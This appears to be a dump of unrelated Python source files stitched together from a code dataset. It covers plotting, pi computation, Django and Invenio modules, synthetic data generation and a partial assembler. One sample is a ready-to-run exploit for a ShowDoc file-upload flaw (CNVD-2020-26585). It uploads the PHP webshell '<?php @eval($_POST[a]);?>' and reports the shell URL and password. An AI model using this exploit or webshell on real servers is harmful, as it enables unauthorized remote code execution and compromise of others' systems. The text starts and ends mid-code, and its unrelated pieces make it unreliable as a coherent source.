itertools.chain.from_iterable(yvalsIDXAll[subIDX])]
[ax.plot(timeArr, yArrr, ls='solid', marker=" ", color='#e6daa6', zorder=1, lw=0.3) for yArrr in
yArr]
del yArr
elapsedTime = time.clock()-startTime
print "Elapsed time plotting the lines: " + str(elapsedTime)
#
# next step adding pies for cases where organisms with the same estimates make different decisions
# this does not check whether the decisions are actually different; it does so implicitly
xTuple = [current[0] for current in coordinates]
yTuple = [current[1] for current in coordinates]
radii = []
for idx in range(len(coordinates)):
colorsPies = [color_palette[idj] for idj in decisionsPies[idx]]
pieFracs = [float(i)/sum(stateProbPies[idx]) for i in stateProbPies[idx]]
currentR= np.sqrt(sum(stateProbPies[idx]))*r
radii.append(currentR)
pp,tt = ax.pie(pieFracs,colors = colorsPies, radius = currentR ,center = coordinates[idx], wedgeprops= {'linewidth':0.0, "edgecolor":"k"})
[p.set_zorder(3+len(coordinates)-idx) for p in pp]
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['bottom'].set_visible(False)
ax.spines['left'].set_visible(False)
plt.sca(ax)
plt.grid(True, 'major', 'y', ls='--', lw=.5, c='k', alpha=.3)
midPoint = (T)/float(2)
yLabels = convertValues([1,midPoint,T-1], T-1,1,1,0)
# removing frame around the plot
plt.ylim(0.4, T-1+0.5)
plt.xlim(-0.6,T-1+0.5)
if iX == 0:
plt.title(str(1-pE0), fontsize = 20)
if iX == len(pC0E0Arr)-1:
plt.xlabel('Time step', fontsize = 20, labelpad=10)
plt.xticks(np.arange(2,T,2), fontsize = 12)
plt.yticks([1, midPoint, T - 1], yLabels) #this doesn't make sense
else:
ax.get_xaxis().set_visible(False)
if jX == 0:
plt.yticks([1, midPoint, T - 1], yLabels,fontsize = 12)
plt.ylabel('pE1', fontsize = 20, labelpad=10)
if jX == len(pE0Arr) -1:
plt.ylabel(str(cueVal), fontsize = 20,labelpad = 15, rotation = 'vertical')
ax.yaxis.set_label_position("right")
ax.set_aspect('equal')
jX += 1
iX += 1
plt.suptitle('Prior probability', fontsize = 20)
fig.text(0.98,0.5,'Cue reliability', fontsize = 20, horizontalalignment = 'right', verticalalignment = 'center', transform=ax.transAxes, rotation = 'vertical')
resultPath = os.path.join(mainPath, plottingPath)
plt.savefig(os.path.join(resultPath,'DevelopmentalTrajectoryReduced.png'), dpi = 400)
| StarcoderdataPython |
3582712 | <gh_stars>0
# somefile.py
def say_hello(name):
print(f"Hello", name)
if __name__ == '__main__':
say_hello('Brian')
| StarcoderdataPython |
5166945 | # arctan = sum_n=0^inf (-1)^n x^(2n+1) / (2n + 1)
# pi = 16 arctan(1/5) - 4 arctan(1/239)
from fractions import Fraction
with open("pi.txt") as f:
pi = f.read()
def compute_pi(n, m):
pi = 0
for i in range(n):
pi += 16 * (-1) ** i * Fraction(1, (2 * i + 1) * 5 ** (2 * i + 1))
for i in range(m):
pi -= 4 * (-1) ** i * Fraction(1, (2 * i + 1) * 239 ** (2 * i + 1))
return pi
def get_decimal(n, places=10000):
N = int(float(n) // 1)
out = f"{N}."
n -= N
for i in range(places):
n *= 10
N = int(float(n) // 1)
out += f"{N}"
n -= N
return out
def get_ndigits(approx):
if not approx.startswith("3."):
return -1
for ndigits, (i, j) in enumerate(zip(pi[2:], approx[2:])):
if i != j:
break
return ndigits
| StarcoderdataPython |
9782393 | from pylab import *;
import RungeKutta;
def dummy(t, f, args):
return zeros(f.shape);
def dummyVel(f, args):
return 1.3;
u = zeros((10,10));
v = zeros((10,10));
z = zeros((10,10));
delta = 0.1;
stepfwd = RungeKutta.RungeKutta4(delta, dummy, dummy, dummyVel);
tnew, fnew = stepfwd.integrate(0, [u,v,z],0.1);
print tnew;
| StarcoderdataPython |
1941415 | from django.db import models
from django.utils import timezone
# https://simpleisbetterthancomplex.com/tutorial/2016/07/22/how-to-extend-django-user-model.html#onetoone
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# Slug
from django.db.models.signals import pre_save
from django.utils.text import slugify
# Markdown
from django.utils.safestring import mark_safe
from markdown_deux import markdown
# For getting absolute url
from django.core.urlresolvers import reverse
from django.http import HttpRequest
# Create your models here.
def upload_location(instance, filename):
return "%s/%s" % (instance.id, filename)
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
# User data
bio = models.TextField(blank=True)
def get_markdown_bio(self):
bio = self.bio
return mark_safe(markdown(bio))
class Post(models.Model):
# Link to another model
author = models.ForeignKey('auth.User')
# Defines title and gets url from title
title = models.CharField(max_length=200)
subtitle = models.CharField(max_length=750)
slug = models.SlugField(unique=True)
text = models.TextField()
created_date = models.DateTimeField(
default=timezone.now)
published_date = models.DateTimeField(
blank=True, null=True)
height_field = models.IntegerField(default=0)
width_field = models.IntegerField(default=0)
image = models.ImageField(upload_to=upload_location,
null=True,
blank=True,
width_field="width_field",
height_field="height_field")
is_active = models.BooleanField(default=True)
def get_absolute_url(self):
return reverse("post_detail", kwargs={"slug": self.slug})
def publish(self):
self.published_date = timezone.now()
self.is_active = True
self.save()
def get_markdown_text(self):
return mark_safe(markdown(self.text))
def set_text_to_markdown(self):
self.text = markdown(self.plain_text)
def delete(self):
self.is_active = False
self.save()
def __str__(self):
return self.title
class Comment(models.Model):
post = models.ForeignKey('blog.Post', related_name='comments')
# Reply to comments
parent = models.ForeignKey("self", null=True, blank=True)
author = models.CharField(max_length=200, default='anon')
text = models.TextField()
created_date = models.DateTimeField(default=timezone.now)
approved_comment = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
# Gets all the children/replies
def children(self):
return Comment.objects.filter(parent=self)
# Checks if instance is a parent.
@property
def is_parent(self):
if self.parent is not None:
return False
return True
def approve(self):
self.approved_comment = True
self.save()
def delete(self):
self.is_active = False
self.save()
def undelete(self):
self.is_active = True
self.save()
def __str__(self):
return self.text
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
# Recursive function that creates slug
def create_slug(instance, new_slug=None):
slug = slugify(instance.title)
if new_slug is not None:
slug = new_slug
query_set = Post.objects.filter(slug=slug).order_by("-id")
exists = query_set.exists()
if exists:
new_slug = "%s-%s" % (slug, query_set.first().id)
return create_slug(instance, new_slug=new_slug)
return slug
def pre_save_post_receiver(sender, instance, *args, **kwargs):
if not instance.slug:
instance.slug = create_slug(instance)
pre_save.connect(pre_save_post_receiver, sender=Post)
| StarcoderdataPython |
8089208 | from unittest import TestCase
from trading_calendars.exchange_calendar_us_extended_hours import USExtendedHoursExchangeCalendar
from .test_trading_calendar import ExchangeCalendarTestBase
class USExtendedHoursCalendarTestCase(ExchangeCalendarTestBase, TestCase):
answer_key_filename = "us_extended_hours"
calendar_class = USExtendedHoursExchangeCalendar
MAX_SESSION_HOURS = 16
| StarcoderdataPython |
8130830 | <reponame>WingsSec/Meppo
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
from cgi import print_form
import requests
import re
from Config.config_requests import ua
requests.packages.urllib3.disable_warnings()
# 脚本信息
######################################################
NAME = 'CNVD_2020_26585'
AUTHOR = "JDQ"
REMARK = 'ShowDoc前台文件上传getshell'
FOFA_RULE = 'app="ShowDoc" '
######################################################
headers = {'User-Agent': ua,
'Content-Type': 'multipart/form-data; boundary=--------------------------921378126371623762173617'}
def poc(target):
result = {}
data = '''
----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
Content-Type: text/plain
<?php @eval($_POST[a]);?>
----------------------------921378126371623762173617--'''
try:
r = requests.post(target+"/index.php?s=/home/page/uploadImg",
headers=headers, data=data, verify=False)
if r.status_code == 200 and r.text:
resu = re.search(
'.*"(http.*?.php)".*', r.text
)
shellurl = resu.group(1)
result['target'] = target
result['poc'] = NAME
result['shell地址'] = shellurl.replace('\/', '/')
result['shell密码'] = 'a'
return result
except:
pass
if __name__ == '__main__':
poc("127.0.0.1")
| StarcoderdataPython |
5025211 | <gh_stars>0
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Invenio module that adds userprofiles to the platform."""
from __future__ import absolute_import, print_function
from flask import Blueprint, current_app, flash, render_template, request
from flask_babelex import lazy_gettext as _
from flask_breadcrumbs import register_breadcrumb
from flask_login import current_user, login_required
from flask_menu import register_menu
from flask_security.confirmable import send_confirmation_instructions
from invenio_db import db
from invenio_theme.proxies import current_theme_icons
from speaklater import make_lazy_string
from .api import current_userprofile
from .forms import EmailProfileForm, ProfileForm, VerificationForm, \
confirm_register_form_factory, register_form_factory
from .models import UserProfile
blueprint = Blueprint(
'invenio_userprofiles',
__name__,
template_folder='templates',
)
blueprint_api_init = Blueprint(
'invenio_userprofiles_api_init',
__name__,
template_folder='templates',
)
blueprint_ui_init = Blueprint(
'invenio_userprofiles_ui_init',
__name__,
)
def init_common(app):
"""Post initialization."""
if app.config['USERPROFILES_EXTEND_SECURITY_FORMS']:
security_ext = app.extensions['security']
security_ext.confirm_register_form = confirm_register_form_factory(
security_ext.confirm_register_form)
security_ext.register_form = register_form_factory(
security_ext.register_form)
@blueprint_ui_init.record_once
def init_ui(state):
"""Post initialization for UI application."""
app = state.app
init_common(app)
# Register blueprint for templates
app.register_blueprint(
blueprint, url_prefix=app.config['USERPROFILES_PROFILE_URL'])
@blueprint_api_init.record_once
def init_api(state):
"""Post initialization for API application."""
init_common(state.app)
@blueprint.app_template_filter()
def userprofile(value):
"""Retrieve user profile for a given user id."""
return UserProfile.get_by_userid(int(value))
@blueprint.route('/', methods=['GET', 'POST'])
@login_required
@register_menu(
blueprint, 'settings.profile',
# NOTE: Menu item text (icon replaced by a user icon).
_('%(icon)s Profile', icon=make_lazy_string(
lambda: f'<i class="{current_theme_icons.user}"></i>')),
order=0
)
@register_breadcrumb(
blueprint, 'breadcrumbs.settings.profile', _('Profile')
)
def profile():
"""View for editing a profile."""
# Create forms
verification_form = VerificationForm(formdata=None, prefix="verification")
profile_form = profile_form_factory()
# Process forms
form = request.form.get('submit', None)
if form == 'profile':
handle_profile_form(profile_form)
elif form == 'verification':
handle_verification_form(verification_form)
return render_template(
current_app.config['USERPROFILES_PROFILE_TEMPLATE'],
profile_form=profile_form,
verification_form=verification_form,)
def profile_form_factory():
"""Create a profile form."""
if current_app.config['USERPROFILES_EMAIL_ENABLED']:
return EmailProfileForm(
formdata=None,
username=current_userprofile.username,
full_name=current_userprofile.full_name,
email=current_user.email,
email_repeat=current_user.email,
prefix='profile', )
else:
return ProfileForm(
formdata=None,
obj=current_userprofile,
prefix='profile', )
def handle_verification_form(form):
"""Handle email sending verification form."""
form.process(formdata=request.form)
if form.validate_on_submit():
send_confirmation_instructions(current_user)
# NOTE: Flash message.
flash(_("Verification email sent."), category="success")
def handle_profile_form(form):
"""Handle profile update form."""
form.process(formdata=request.form)
if form.validate_on_submit():
email_changed = False
with db.session.begin_nested():
# Update profile.
current_userprofile.username = form.username.data
current_userprofile.full_name = form.full_name.data
db.session.add(current_userprofile)
# Update email
if current_app.config['USERPROFILES_EMAIL_ENABLED'] and \
form.email.data != current_user.email:
current_user.email = form.email.data
current_user.confirmed_at = None
db.session.add(current_user)
email_changed = True
db.session.commit()
if email_changed:
send_confirmation_instructions(current_user)
# NOTE: Flash message after successful update of profile.
flash(_('Profile was updated. We have sent a verification '
'email to %(email)s. Please check it.',
email=current_user.email),
category='success')
else:
# NOTE: Flash message after successful update of profile.
flash(_('Profile was updated.'), category='success')
| StarcoderdataPython |
6682046 | import warnings
import rasterio
def rasterio_decorator(func):
def wrapped_f(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
with rasterio.drivers():
return func(*args, **kwargs)
return wrapped_f
| StarcoderdataPython |
3266164 | import torch
import torch.distributed as dist
def check_equal(A, B):
assert torch.allclose(A, B, rtol=1e-3, atol=1e-1) == True
def replace_parameter_add_grad(layer, weight=None, bias=None):
if weight is not None:
delattr(layer, 'weight')
setattr(layer, 'weight', weight)
layer.weight.requires_grad = True
if bias is not None:
delattr(layer, 'bias')
setattr(layer, 'bias', bias)
layer.bias.requires_grad = True
def broadcast_tensor_chunk(tensor, chunk_size=1, local_rank=0):
dist.broadcast(tensor, src=0)
tensor_chunk = torch.chunk(tensor, chunk_size, dim=-1)[local_rank]
return tensor_chunk.clone() | StarcoderdataPython |
1922702 | <reponame>livenson/waldur-freeipa
from . import tasks, utils
from .log import event_logger
def schedule_sync(*args, **kwargs):
tasks.schedule_sync()
def schedule_sync_on_quota_change(sender, instance, created=False, **kwargs):
if instance.name != utils.QUOTA_NAME:
return
if created and instance.limit == -1:
return
tasks.schedule_sync()
def log_profile_event(sender, instance, created=False, **kwargs):
profile = instance
if created:
event_logger.freeipa.info(
'{username} FreeIPA profile has been created.',
event_type='freeipa_profile_created',
event_context={
'user': profile.user,
'username': profile.username,
}
)
elif profile.tracker.has_changed('is_active') and profile.tracker.previous('is_active'):
event_logger.freeipa.info(
'{username} FreeIPA profile has been disabled.',
event_type='freeipa_profile_disabled',
event_context={
'user': profile.user,
'username': profile.username,
}
)
elif profile.tracker.has_changed('is_active') and not profile.tracker.previous('is_active'):
event_logger.freeipa.info(
'{username} FreeIPA profile has been enabled.',
event_type='freeipa_profile_enabled',
event_context={
'user': profile.user,
'username': profile.username,
}
)
def log_profile_deleted(sender, instance, **kwargs):
profile = instance
event_logger.freeipa.info(
'{username} FreeIPA profile has been deleted.',
event_type='freeipa_profile_deleted',
event_context={
'user': profile.user,
'username': profile.username,
}
)
| StarcoderdataPython |
1656590 | <reponame>rakesh-lagare/Thesis_Work
# -*- coding: utf-8 -*-
from random import randrange
import matplotlib.pyplot as plt
import numpy as np
import numpy.random as nprnd
import pandas as pd
import os
os.remove("dataframe.csv")
os.remove("dataList.csv")
def pattern_gen(clas,noise,scale,offset):
ts_data=[]
tsn= [10,10,10,10,13,10,10,10,13,10,10,10,10,10,10,10,13,10,10,10,13,10,10,10]
ts_noise = nprnd.randint(15, size=100)
ts_n0ise = nprnd.randint(5, size=100)
#box
if (clas == 1):
ts_data= [10,20,30 ,40,50,60,70,70,70,70,70,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,
80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,80,20,10]
if(scale == 1):
ts_data =[i * 2.5 for i in ts_data]
if(noise == 1):
ts_data = [sum(x) for x in zip(ts_data, ts_noise)]
#linear increase
elif (clas == 2):
ts_data = [11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,
41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62]
if(scale == 1):
ts_data =[i * 2.5 for i in ts_data]
if(noise == 1):
ts_data = [sum(x) for x in zip(ts_data, ts_noise)]
#linear decrease
elif (clas == 3):
ts_data = [11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,
41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62]
ts_data.reverse()
if(scale == 1):
ts_data =[i * 2.5 for i in ts_data]
if(noise == 1):
ts_data = [sum(x) for x in zip(ts_data, ts_noise)]
#periodic
elif (clas == 4):
ts_data = [20,30,40,50,60,70,80,90,70,60,50,40,30,20,10,10,10,10,10,20,30,40,50,60,70,80,90,70,60,50,
40,30,20,10,10,10,10,10,20,30,40,50,60,70,80,90,70,60,50,40,30,20]
if(scale == 1):
ts_data =[i * 3.5 for i in ts_data]
if(noise == 1):
ts_data = [sum(x) for x in zip(ts_data, ts_noise-10)]
elif (clas == 5):
ts_data = [20,30,85,88,90,88,85,36,34,36,55,60,58,20,20,18,18,20,20,90,85,55,55,55,60,
10,20,30,85,88,90,88,85,36,34,36,55,60,58,20,20,18,18,20,20,90,85,55,55,55,60,10]
if(scale == 1):
ts_data =[i * 3.5 for i in ts_data]
if(noise == 1):
ts_data = [sum(x) for x in zip(ts_data, ts_noise)]
elif (clas == 6):
ts_data = [10,20,30,90,90,90,90,90,90,90,90,90,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,
55,55,55,55,55,55,55,55,90,90,90,90,90,90,90,90,90,30,20,10]
if(scale == 1):
ts_data =[i * 3.5 for i in ts_data]
if(noise == 1):
ts_data = [sum(x) for x in zip(ts_data, ts_noise)]
tss= tsn + ts_data + tsn
return (tss)
def prep_data(num):
df = pd.DataFrame()
data_list = []
for idx in range(num):
random_clas = randrange(4) + 1
random_noise = 1#randrange(2)
random_scale = randrange(2)
random_offset = 0#randrange(2)
if(random_scale == 0):
clas = random_clas + 0.1
else:
clas = random_clas + 0.2
ts_data = pattern_gen(random_clas,random_noise,random_scale,random_offset)
temp_df = pd.DataFrame([[idx,clas,random_noise,ts_data]], columns=['index','class','noise','data'])
df = df.append(temp_df)
data_list.extend(ts_data)
plt.plot(data_list)
plt.show()
return (df,data_list)
df,data_list = prep_data(10000)
export_csv = df.to_csv (r'C:\Megatron\Thesis\Thesis_Work\Sax\Final_code_test\dataframe.csv', index = None, header=True)
temp_df = pd.DataFrame()
temp_df.insert(loc=0, column='sub_section', value=data_list)
export_csv1 = temp_df.to_csv (r'C:\Megatron\Thesis\Thesis_Work\Sax\Final_code_test\dataList.csv', index = None, header=True)
| StarcoderdataPython |
3412713 | <reponame>tiphaine/o2-base<gh_stars>0
import os
caf_raw = os.path.join('data', 'raw', 'caf')
caf_processed = os.path.join('data', 'processed', 'caf')
foyers_alloc_bas_revenus_prefix = 'http://data.caf.fr/dataset/79250fae-53f6-4d7c-91da-218e79bdcb60/resource/'
foyers_alloc_bas_revenus_url = {
'commune': {
'2009': '{}c51b0621-9b2a-4031-9859-553b06731ec3/download/BasrevenuCom2009.csv'.format(foyers_alloc_bas_revenus_prefix),
'2010': '{}4a9e6c6d-0f36-4e1c-897a-e7801a0b35d0/download/BasrevenuCom2010.csv'.format(foyers_alloc_bas_revenus_prefix),
'2011': '{}29796950-288c-4d25-b3d5-d365dd14a712/download/BasrevenuCom2011.csv'.format(foyers_alloc_bas_revenus_prefix),
'2012': '{}cbb003eb-46da-4ce2-98ad-e617dfef4e2b/download/BasrevenuCom2012.csv'.format(foyers_alloc_bas_revenus_prefix),
'2013': '{}c45d1b54-17be-4a80-89a0-5ec832e82599/download/BasrevenuCom2013.csv'.format(foyers_alloc_bas_revenus_prefix),
'2014': '{}a2e0ac46-d4ac-42cc-a28c-bd6b067004b0/download/BasrevenuCom2014.csv'.format(foyers_alloc_bas_revenus_prefix),
'2015': '{}2f5e861c-0626-4e91-8745-0a5998b4aca7/download/BasrevenuCom2015.csv'.format(foyers_alloc_bas_revenus_prefix),
'2016': '{}682daddd-82eb-4c9e-b105-4b06327dd5bb/download/BASREVENUCOM.csv'.format(foyers_alloc_bas_revenus_prefix),
'2017': '{}682daddd-82eb-4c9e-b105-4b06327dd5bb/download/BASREVENUCOM.csv'.format(foyers_alloc_bas_revenus_prefix),
'2018': '{}682daddd-82eb-4c9e-b105-4b06327dd5bb/download/BASREVENUCOM.csv'.format(foyers_alloc_bas_revenus_prefix),
},
}
foyers_alloc_bas_revenus_files = {
'commune': {
'2009': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2009.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2009.csv'),
},
'2010': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2010.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2010.csv'),
},
'2011': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2011.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2011.csv'),
},
'2012': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2012.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2012.csv'),
},
'2013': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2013.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2013.csv'),
},
'2014': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2014.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2014.csv'),
},
'2015': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2015.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2015.csv'),
},
'2016': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2016+.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2016.csv'),
},
'2017': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2017+.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2017.csv'),
},
'2018': {
'raw': os.path.join(caf_raw, 'caf_foyers_bas_revenus-2018+.csv'),
'processed': os.path.join(caf_processed, 'caf_foyers_bas_revenus-2018.csv'),
},
},
}
| StarcoderdataPython |
3313658 | # /bin/env python
"""
pyFSQP - A variation of the pyFSQP wrapper specificially designed to
work with sparse optimization problems.
"""
# =============================================================================
# FSQP Library
# =============================================================================
try:
from . import ffsqp
except ImportError:
ffsqp = None
# =============================================================================
# Standard Python modules
# =============================================================================
import os
import time
# =============================================================================
# External Python modules
# =============================================================================
import numpy as np
# # ===========================================================================
# # Extension modules
# # ===========================================================================
from ..pyOpt_optimizer import Optimizer
from ..pyOpt_error import Error
# =============================================================================
# FSQP Optimizer Class
# =============================================================================
class FSQP(Optimizer):
"""
FSQP Optimizer Class - Inherited from Optimizer Abstract Class
"""
def __init__(self, *args, **kwargs):
name = "FSQP"
category = "Local Optimizer"
defOpts = {
"mode": [int, 100], # FSQP Mode (See Manual)
"iprint": [int, 2], # Output Level (0 - None, 1 - Final, 2 - Major, 3 - Major Details)
"miter": [int, 500], # Maximum Number of Iterations
"bigbnd": [float, 1e10], # Plus Infinity Value
"epstol": [float, 1e-8], # Convergence Tolerance
"epseqn": [float, 0], # Equality Constraints Tolerance
"iout": [int, 6], # Output Unit Number
"ifile": [str, "FSQP.out"], # Output File Name
}
informs = {
0: "Normal termination of execution",
1: "User-provided initial guess is infeasible for linear constraints, unable to generate a point satisfying all these constraints",
2: "User-provided initial guess is infeasible for nonlinear inequality constraints and linear constraints, unable to generate a point satisfying all these constraints",
3: "The maximum number of iterations has been reached before a solution is obtained",
4: "The line search fails to find a new iterate",
5: "Failure of the QP solver in attempting to construct d0, a more robust QP solver may succeed",
6: "Failure of the QP solver in attempting to construct d1, a more robust QP solver may succeed",
7: "Input data are not consistent, check print out error messages",
8: "Two consecutive iterates are numerically equivalent before a stopping criterion is satisfied",
9: "One of the penalty parameters exceeded bigbnd, the algorithm is having trouble satisfying a nonlinear equality constraint",
}
if ffsqp is None:
raise Error(
"There was an error importing the compiled \
ffsqp module"
)
Optimizer.__init__(self, name, category, defOpts, informs, *args, **kwargs)
# We need jacobians in dens2d formation
self.jacType = "dense2d"
def __call__(
self, optProb, sens=None, sensStep=None, sensMode="FD", storeHistory=None, hotStart=None, storeSens=True
):
"""
This is the main routine used to solve the optimization
problem.
Parameters
----------
optProb : Optimization or Solution class instance
This is the complete description of the optimization problem
to be solved by the optimizer
sens : str or python Function.
Specifiy method to compute sensitivities. To explictly
use pyOptSparse gradient class to do the derivatives with
finite differenes use 'FD'. 'sens' may also be 'CS'
which will cause pyOptSpare to compute the derivatives
using the complex step method. Finally, 'sens' may be a
python function handle which is expected to compute the
sensitivities directly. For expensive function evaluations
and/or problems with large numbers of design variables
this is the preferred method.
sensStep : float
Set the step size to use for design variables. Defaults to
1e-6 when sens is 'FD' and 1e-40j when sens is 'CS'.
sensMode : str
Use 'pgc' for parallel gradient computations. Only
available with mpi4py and each objective evaluation is
otherwise serial
storeHistory : str
File name of the history file into which the history of
this optimization will be stored
hotStart : str
File name of the history file to "replay" for the
optimziation. The optimization problem used to generate
the history file specified in 'hotStart' must be
**IDENTICAL** to the currently supplied 'optProb'. By
identical we mean, **EVERY SINGLE PARAMETER MUST BE
IDENTICAL**. As soon as he requested evaluation point
from SNOPT does not match the history, function and
gradient evaluations revert back to normal evaluations.
storeSens : bool
Flag sepcifying if sensitivities are to be stored in hist.
This is necessay for hot-starting only.
"""
self.callCounter = 0
self.storeSens = storeSens
if len(optProb.constraints) == 0:
self.unconstrained = True
optProb.dummyConstraint = False
self.optProb = optProb
self.optProb.finalizeDesignVariables()
self.optProb.finalizeConstraints()
self._setInitialCacheValues()
self._setSens(sens, sensStep, sensMode)
blx, bux, xs = self._assembleContinuousVariables()
ff = self._assembleObjective()
# Determine all the constraint information, numbers etc.
if self.optProb.nCon > 0:
# We need to reorder this full jacobian...so get ordering:
indices, blc, buc, fact = self.optProb.getOrdering(["ni", "li", "ne", "le"], oneSided=True)
ncon = len(indices)
self.optProb.jacIndices = indices
self.optProb.fact = fact
self.optProb.offset = buc
# We need to call getOrdering a few more times to get
# the remaining sizes:
indices, __, __, __ = self.optProb.getOrdering(["ni"], oneSided=True)
nineqn = len(indices)
indices, __, __, __ = self.optProb.getOrdering(["ni", "li"], oneSided=True)
nineq = len(indices)
indices, __, __, __ = self.optProb.getOrdering(["ne"], oneSided=True)
neqn = len(indices)
indices, __, __, __ = self.optProb.getOrdering(["ne", "le"], oneSided=True)
neq = len(indices)
else:
nineqn = 0
nineq = 0
neqn = 0
neq = 0
ncon = 0
# We make a split here: If the rank is zero we setup the
# problem and run SNOPT, otherwise we go to the waiting loop:
if self.optProb.comm.rank == 0:
# Set history/hotstart/coldstart
self._setHistory(storeHistory, hotStart)
# ======================================================================
# FSQP - Objective Values Function
# ======================================================================
def obj(nparam, j, x, fj):
if self._checkEval(x):
self._internalEval(x)
fj = self.storedData["fobj"]
return fj
# ======================================================================
# FSQP - Constraint Values Function
# ======================================================================
def cntr(nparam, j, x, gj):
# for given j, assign to gj the value of the jth constraint evaluated at x
if self._checkEval(x):
self._internalEval(x)
gj = self.storedData["fcon"][j - 1]
return gj
# ======================================================================
# FSQP - Objective Gradients Function
# ======================================================================
def gradobj(nparam, j, x, gradfj, obj):
# assign to gradfj the gradient of the jth objective function evaluated at x
if self._checkEval(x):
self._internalEval(x)
gradfj[0:nparam] = self.storedData["gobj"]
return gradfj
# ======================================================================
# FSQP - Constraint Gradients Function
# ======================================================================
def gradcntr(nparam, j, x, gradgj, obj):
# assign to gradgj the gradient of the jth constraint evaluated at x
if self._checkEval(x):
self._internalEval(x)
gradgj[0:nparam] = self.storedData["gcon"][j - 1]
return gradgj
# Setup argument list values
nparam = len(xs)
nvar = nparam
nf = 1
mode = self.getOption("mode")
if self.getOption("iprint") >= 0:
iprint = self.getOption("iprint")
else:
raise Error("Incorrect iprint option. Must be >= 0")
iout = self.getOption("iout")
ifile = self.getOption("ifile")
if iprint > 0:
if os.path.isfile(ifile):
os.remove(ifile)
gg = np.zeros(max(ncon, 1))
miter = self.getOption("miter")
inform = 0
bigbnd = self.getOption("bigbnd")
epstol = self.getOption("epstol")
epsneq = self.getOption("epseqn")
udelta = 0
nobj = 1
iwsize = 6 * nvar + 8 * max([1, ncon]) + 7 * max([1, nobj]) + 30
iw = np.zeros([iwsize], np.float)
nwsize = (
4 * nvar ** 2
+ 5 * max([1, ncon]) * nvar
+ 3 * max([1, nobj]) * nvar
+ 26 * (nvar + max([1, nobj]))
+ 45 * max([1, ncon])
+ 100
)
w = np.zeros([nwsize], np.float)
# Run FSQP
t0 = time.time()
# fmt: off
ffsqp.ffsqp(nparam, nf, nineqn, nineq, neqn, neq, mode, iprint, miter,
inform, bigbnd, epstol, epsneq, udelta, blx, bux, xs, ff,
gg, iw, iwsize, w, nwsize, obj, cntr, gradobj, gradcntr,
iout, ifile)
# fmt: on
optTime = time.time() - t0
if iprint > 0:
ffsqp.closeunit(iprint)
# Broadcast a -1 to indcate SLSQP has finished
self.optProb.comm.bcast(-1, root=0)
# Store Results
sol_inform = {}
# sol_inform['value'] = inform
# sol_inform['text'] = self.informs[inform[0]]
# Create the optimization solution
sol = self._createSolution(optTime, sol_inform, ff, xs)
else: # We are not on the root process so go into waiting loop:
self._waitLoop()
sol = None
# Communication solution and return
sol = self._communicateSolution(sol)
return sol
def _on_setOption(self, name, value):
pass
def _on_getOption(self, name):
pass
| StarcoderdataPython |
11264632 | <reponame>dwahme/simple_cpu
class Assembler:
def __init__(self):
pass
# Converts an instruction to binary
def encode(self, opcode, num_args, starts, args):
instr = opcode << 12
if num_args != len(args):
strs = [str(x) for x in args]
print("Invalid number of arguments: " + " ".join(strs))
return -1
for idx, start in enumerate(starts[:-1]):
if args[idx + 1] >= 2 ** (starts[idx + 1] - start):
strs = [str(x) for x in args]
print("Argument {} too large: ".format(args[idx + 1]) +
" ".join(strs))
return -1
else:
instr += args[idx + 1] << 16 - starts[idx + 1]
return instr
# Converts a file to binary
def assemble(self, file, outfile=""):
out = []
with open(file, "r") as f:
for line in f.readlines():
splits = line.split()
op = splits[0]
nums = [int(x) for x in splits[1:]]
if len(splits) == 0 or op[:2] == "//":
# Comment or empty line
pass
elif op == "ADD":
out.append(self.encode(0, 4, [4, 7, 10, 16], [op] + nums))
elif op == "ADDR":
out.append(self.encode(1, 4, [4, 7, 10, 13], [op] + nums))
elif op == "SUB":
out.append(self.encode(2, 4, [4, 7, 10, 16], [op] + nums))
elif op == "SUBR":
out.append(self.encode(3, 4, [4, 7, 10, 13], [op] + nums))
elif op == "MOV":
out.append(self.encode(4, 3, [4, 7, 16], [op] + nums))
elif op == "MOVR":
